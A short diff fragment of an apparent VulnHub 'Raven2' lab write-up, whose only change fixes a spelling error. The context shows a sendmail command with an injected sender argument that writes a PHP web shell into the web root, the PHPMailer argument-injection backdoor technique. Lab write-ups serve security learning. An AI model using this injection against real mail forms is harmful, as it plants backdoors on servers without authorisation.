klezVirus/Posts/reviews/vulnhub/raven2/readme.md

 $mail->Body     = $message;
 ```

-Any of the two can be choosen to inject the backdoor payload.
+Any of the two can be chosen to inject the backdoor payload.
 To test it, it is possible to launch the sendmail directly from the command line and craft the mail manually:

 ```
 tester@Raven:# $(echo '/usr/sbin/sendmail -f"d3adc0de\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server" @gmail.com')